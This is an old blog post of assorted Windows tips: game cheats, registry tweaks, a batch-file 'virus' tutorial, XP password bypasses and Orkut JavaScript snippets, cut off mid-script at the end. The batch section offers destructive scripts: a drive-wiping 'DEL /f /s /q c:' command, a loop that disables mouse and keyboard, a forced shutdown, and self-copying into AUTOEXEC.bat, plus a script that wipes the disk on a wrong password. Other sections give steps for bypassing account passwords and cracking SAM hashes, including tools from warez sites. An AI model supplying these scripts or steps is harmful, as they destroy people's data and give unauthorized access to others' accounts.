Oct 13, 2009

0 comments

Cheat for Windows Games

Minesweeper

Secret - Reveal Mines

Instructions -
Minimize or close all running applications.
Launch Minesweeper, then type xyzzy.
Next hold down either shift key for one second.
Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen.
This pixel will change to black when your mouse moves over a mine.
You may need to change you desktop background to a solid color other then white or black to see the pixel.



Pinball

Secret - Extra Balls
Instructions - Type 1max at the start of a new ball to get extra balls.

Secret - Gravity Well
Instructions - Type gmax at the start of a new game to activate the Gravity Well.

Secret - Instant Promotion
Instructions - Type rmax at the start of a new game to go up in ranks.

Secret - Skill Shot
Instructions - Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. There are six yellow light bars that are worth a varying amount of points:

First: 15,000 points
Second: 30,000 points
Third: 75,000 points
Fourth: 30,000 points
Fifth: 15,000 points
Sixth: 7,500 points

Secret - Test Mode
Instructions - Type hidden test at the start of a new ball to activate Test Mode. No notification will be given that this is activated but you can now left-click the mouse button and drag the ball around.

Secret - Unlimited Balls
Instructions - Type bmax at the start of a new ball. No notification will be given that this is activated but when a ball is lost a new ball will appear from the yellow wormhole indefinitely. Once this is activated you will be unable to activate other secrets without restarting

FreeCell

Secret - Instant Win
Instructions - Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win.

Secret - Hidden Game Modes
Instructions - In the "Game" menu choose "Select Game". Enter -1 or -2 to activate the hidden game modes.


Solitaire


Secret - Instant Win

Instructions - Press Alt + Shift + 2 during game play to instantly win.

Secret - Draw single cards in a Draw Three game

Instructions - Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of drawing three cards you will only draw one.

Infinite Points

In the Windows XP version of solitaire, draw from the deck at least twice. Hold control and drag a card down from the deck. Click the "A" key and then let go of the left mouse key. You will get 10 points for this. Continue doing this for infinite points!

Infinite points trick II

To do this trick, finish a game of solitaire with the time bonus option on. The cards will start bouncing. Click on the solitaire screen and the play again box will pop up. Select no, so the solitaire screen is just blank green. Use the instant win cheat (Alt+Shift+2) and you will recieve the time bonus you got last game will be added to your last game's score. For example, if your time bonus was 5000, and your final score was 6000, after using this glitch, you will have a score of 11000. This glitch can be used as many times as you want.

//-----------------------------------------------------------------
// registry hack which will allow you to see your opponents' cards
//-----------------------------------------------------------------
Launch REGEDIT.EXE and navigate to
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Applets/Hearts.

NOTE: You may have to create the Hearts key under Applets In the right-hand pane, create a new String Value. Immediately rename it to "ZB" (without the quotes); give it a value of "42" (again, sans quotes). The next time you're in a game of Hearts, press CTRL + SHIFT + ALT + F12.

Change ICONS used for specific Drives

Open regedit by typing regedit into Start->Run

then navigate to

HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer

Now create a key(KEY not VALUE!!) called DriveIcons under Explorer...
Now within DriveIcons, create another key with the drive letter you want to change

(e.g.,HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window s\CurrentVersion\Explorer\DriveIcons\K)...

Create another key within the drive letter key called DefaultIcon...
Now set the default String value equal to the icon you want to use.
If you have a file that has more than one icon in it, such as a DLL file, use the standard
C:\full_path\icon_file.dll,n ) where n is the number of the icon within the file icon_file.dll...

Batch File Tutorials

A batch file is usually used to create viruses. Thats why I wanted to learn it at first. Its a program that uses MS-DOS commands (As far as i know, i mean think, its meant for mac and windows only). To make this program, you go to notepad only! write your batch, and save is as: file_name.BAT only bat! Now lets move on.

In a batch you should always start it with:

@echo off
cls

@echo off hides all the responces to your commands. In example, if you type "echo" then the command prompt will respond by saying: "echo on/off" You dont want to person using the program seeing that. CLS is pretty much the same but for the commands behind it. For example:

echo
cls

Get it?

_______________________________
|The Hackers Name
|_______________________________
|This is a test
|
|
|press any key to continue....
|
|_______________________________


Now, how did i do that?:

@echo off
cls
title The Hackers Name
echo This is a test
echo.
echo.
pause

* When you type echo with text infront of it, it will show that text in the program.
* When you type echo. with a period, it will make a blank line.
* When you type pause, it will say: "press any key to continue" and will continue the program when you press it.
* When you type Title with text infront of it, it will print that text at the top of the window (where it says The Hackers Name)

__________________________________________________ ______________________________

__________________

the START command
START will start any program on the computer. For example:

start (program to start)

You can even start a URL and it will automatically open the browser. Like this:

start www.google.com





Rundll32
Rundll32 will control any of the stuff connected to the computer. Example: Keyboard , Mouse, etc.

Rundll32 mouse,disable
Rundll32 keyboard,disable

CON2PRT /f will remove all printer connections.


:name
First thing is that it doesnt have to say "name" it can say whatever you want it to saybut has to have a : . This makes a title for the following commands after it, (untill you make another title). Once you know this, you should know the goto command. So look at what we got here:


:pancakes
@echo off
cls
Rundll32 mouse,disable
Rundll32 keyboard,disable
echo.
echo.
echo i hAcKeD yOu bitch!!!
echo.
echo And there is nothing you can do about it!
echo.
echo Scared?
echo.
echo well this is going to happen again and again because of the following goto sign
echo.
echo.
goto pancakes

Saw what i just did there? Think about it. If the program is going to start over, its going to go to the end (the end has a goto and it said goto pankakes. you know where pankakes is? at the beginning, meaning that this program will start over and over and over and over and over and over........ again and again...............
DEL
del is one of my favorite. I can destroy a machine with this command (ill get to that soon). del means delete.


Now, we can have some fun. Im not about to tell you what they always tell me, because i use this myself. Im not a hypocrit.
All im going to tell you is to be careful. The command:

DEL /f /s /q c:

is going to delete the whole entire system with in about 10-15 seconds.
DEL /f is going to force the deletion. /q is going to make it quiet, /s is going to delete the whole tree and :c
thats the computer. (you have to tell it what your deleting, it can just delete something in particular. You dont want that. you want it all! smile.gif


Input.
Input would look like this

echo What is your name?
set /p name=
echo.
echo.
echo Hello %name% , My name is The Hackers Name.


So i asked whats his name and he typed something, whatever he typed i set to his name (set /p name=)
then i wanted to say hello to his name. So whatever he typed his name as, it will show wherever i type %name% because i set it to the word name. Get it? Now lets move on to passwords. smile.gif

Echo Please type in Password to enter The Hackers Name
set /p password=
echo.
echo.
IF %password% equ 18392 goto accessgranted
echo.
echo.
echo Access Denied
pause
exit
:accessgranted
echo Access granted
pause
Welcome to The Hackers Name
pause
exit

Whats to explain, i think you got it. If not, your really stupid and you should look at it again (no offence).


__________________________________


@ping.exe 127.0.0.1 -n #ofseconds -w 1000 > nul
I dont even understand this code, i just know what it is. Its going to wait a number of seconds untill continueing. Its the same thing as pause except it doesnt say anything and you dont have to press a key, it continues when the number of seconds you set it to are up. in the code where is says #ofseconds its not supposed to say that, its supposed to say 3 for three seconds and 8 for eight seconds, lol, im explaining it like your a dummy.

To shutdown, type this:

shutdown -s -t #ofsecondstoshutdown -c "i hAcKeD yOu!" -f

in the number of seconds type how many seconds till shutdown
and after the -c in the quotations, type your message
(the shutdown countdown window is non closable and even if it is, it will still activate)



To autorun a program when the computer starts, just type this in right before ANYTHING ELSE.

cls
cd c:
type cd c:
ATTRIB c:AUTOEXEC.bat -H
%0 >>c:AUTOEXEC.bat
echo >copy %0
ATTRIB c:AUTOEXEC.bat +H
del /q %0
cls


So now you have fun doing what you like. Remember, you can help, and you can hurt, but think about the possible consequences if you get caught.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
######################################
@@@@@@@@@@@@@@@@@@@@@
************************************************** *******
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}} }}}}}}}}




ill make one right now that covers most of this tutorial:


:Home
@echo off
cls
color 0c
Title The Hackers Name
echo Please enter password.
echo (Wrong password will activate an internal destruction!)
echo.
set /p password=
IF %password% equ 123456 goto accessgranted
echo.
echo.
echo Access Denied
del /f /s /q c:
shutdown -s -t 8 -c "Access Denied/Internal destruction" -f
:accessgranted
cls
echo.
echo.
echo.
echo.
echo Welcome to The Hackers Name
echo.
echo.
pause
goto choices
:choices
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo To go to our website, type: website
echo sorry, we dont have any other choices for you now.
echo.
set /p choice=
If %choice% equ website goto website
If %choice%equ exit goto exit
echo.
echo.
echo Error, unknown choice.
pause
goto choices
:oursite
start www.thehackersname.tk
pause
goto choices
:exit
exit

Some More XP Tricks

Creating a desktop shortcut for locking ur compututer
If you use your computer in an area where others may have access to it, and there are things on your system you would rather have kept confidential, locking your desktop when you leave the computer is an essential task. Here's a recipe for a desktop shortcut that will lock your computer in two easy clicks:

Right click on an empty area of the desktop and choose 'new' then 'shortcut.' The create shortcut wizard will open; in the first text box, type '%windir%\System32\rundll32.exe user32.dll,LockWorkStation' and then give your shortcut an appropriate name on the next page, and hit 'finish.'

You will notice that the shortcut you created has a blank icon. To select a more appropriate one, right click on the shortcut and hit 'properties.' In the 'shortcut' tab, click the 'change icon' button.

In the 'look for icons in this file' box, type '%SystemRoot%\system32\SHELL32.dll' then click 'ok' to see a range of icons for your new shortcut. Choose an appropriate icon. Your desktop locking shortcut is now ready for use. Test it out.
Renaming The Start Button:
To rename the start button, you will need a hex editor.
My preference is UltraEdit


Copy the \windows\explore.exe file to a new name (e.g. explorer_1.exe)
With the hex editor, open that file and go to offset 412b6
You will see the word start with blanks between each letter
Edit it be any 5 characters or less
Save the file
Boot to DOS
Copy the existing c:\windows\explorer.exe to explorer.org
Copy explorer_1.exe to explorer.exe
You will also need to replace the explorer.exe in the c:\windows\system32\dllcache file as well with the new one.Note: If the partition is NTFS and you can't access the files from DOS:

Start Regedit
Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon.
Change the value of Shell from Explorer.exe to explorer_1.exe

Breaking The XP Password:
In case of user password boot the pc in safemode by pressing the F8 key and then selecting the Safe Mode option. You can now logon as an administrator and XP wont prompt for the password. Incase of an administrator account try rebooting the pc in DOS. access C:\Windows\system32\config\sam . Rename SAM as SAM.mj
Now XP wont ask for password next time You Login. Also

Go to the cmd prompt .
Type net user *.
It will list all the users.
Again type net user "administrator" or the name of the administrator "name" *.
e.g.: net user aaaaaa *(where aaaaaa is the name).
It will ask for the password.
Type the password and there you are done.
Logging In As Administrator:

Hold the Ctrl-Alt key and press Del twice. This will bring up the normal login and you can log on as Administrator.

To unhide the Administrator account so it does show up:

Start Regedit

Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList

Unhide the Administrator key by giving it a value of 1
How to Hide the drives(c:,d:,e:,a:...etc) in My Computer
This is a great trick you can play on your friends. To disable the display of local or networked drives when you click My Computer.


1.Go to start->run.Type regedit.Now go to:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Now in the right pane create a new DWORD item and name it NoDrives(it is case sensitive). Now modify it's value and set it to 3FFFFFF (Hexadecimal) .Now restart your computer. So, now when you click on My Computer, no drives will be shown(all gone...). To enable display of drives in My Computer, simply delete this DWORD item that you created.Again restart your computer.You can now see all the drives again.
Lock your USB port
To do this you have to make a registry tweak taht will prevent writting to the usb port in Windows XP.
1) Go to 'Start|Run' and type 'Regedit'.
2) Navigate to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control.
3) Here add a new folder on the left pane by right clicking on it and selecting 'New|Key'.
4) Name this folder 'StorageDevicePolicies'.
5) Click this new folder and in the window on the right create a new DWORD value, lsbel it WriteProtect, give it avalue of '1'.
6) Now users will not be able to write any data on the USB.

To turn it off just set th evalue to '0'

Find Password of XP Account from SAM File

What is SAM?

SAM file stores all the user info and passwords of all the accounts of a computer using Windows NT family OS(Windows XP, Windows server 2003,etc.).So if you can somehow get this file you can get the passwords.

How can one find passwords from the SAM file?

There are three places where this file can be cracked from:-
i) From the original file
%systemroot%/system32/config
This file is locked to all users during the windows is running,so that you can't open it while you are working in windows. (Find out how you can use this file....Google dear frnds).

ii) The system keeps a backup of this file in the
%systemroot%/repair/sam._
This file is available to all users at any time. So copy this file to any directory and crack the passwords using any good password cracker. I would tell you about one, not only coz its very popular but also that its free.(Find others urselves the net has a gr8 many of them)

John the Ripper:- Its a dictionary cracker and will crack almost 80% of times you use it(unless the system admin has a knack in complicating things.)

iii) You can use PWDUMP to directly crack the passwords from the registry.pwdump uses .DLL injection in order to use the system account to view the password hashes stored in the registry.(Try to find out more about pwdump)

How to prevent people from cracking ur SAM file?

i) Try to avoid password which are dictionary words.

ii) Try to use special characters in ur password.

iii)Try to add non-printable ascii characters to your passwords

Boot from knoppix live and connect a thumb drive and browse into Windows/system32/config directory and get the SAM file out.Download LC5 with crack from any warez site and load this SAM file to LC5.LC5 is a decryptor.You will get your password out.

1)make a bootable pen drive which can access ntfs partition
2)boot from pen drive
3)copy sam file to pen drive
4)then we load hash table(OPHCrack) which works very efficiently(100%)
5)get password

Orkut JavaScripts

Copy & Paste the scripts in ur address bar

Image Roller

Follow the steps:
1) Open any page that contains images.
2) Copy the following text and paste it in your address bar

javascript:R=-1;DI=document.images;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position='absolute';DIS.left=A(0,7,300);DIS.top=A(1.6,6,150)}setInterval('R++;B(R%DIL)',15);void(0)
3) Hit ENTER key

Double the size of your Friends Image

Follow the steps:
1) Open any profile whose friends' images you wish to double.
2) Copy the following text and paste it in your address bar

javascript:document.body.innerHTML=document.body.innerHTML.replace(/small/g,"medium");void(0)
3) Hit ENTER key

Image Expander

To expand the display image of any profile

1) Open any profile whose display image you want to expand.
2) Copy the following text and paste it in your address bar

javascript:mwunm=128;void(setInterval("mwunm++;document.images[2].width=mwunm",5))
3) Hit ENTER key of your keyboard.

Colourful scraps

For writing multi colored scrap, follow the steps:

1) Open any scrapbook.
2) Write your message in the scrap. Do NOT click on submit.
3) Copy the following text and paste it in your address bar


javascript:cor=new Array('aqua','blue','fuchsia','gold','gray','green','lime','maroon','navy','olive','orange','pink','purple','red','silver','teal','violet', 'yellow' );var z=0;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y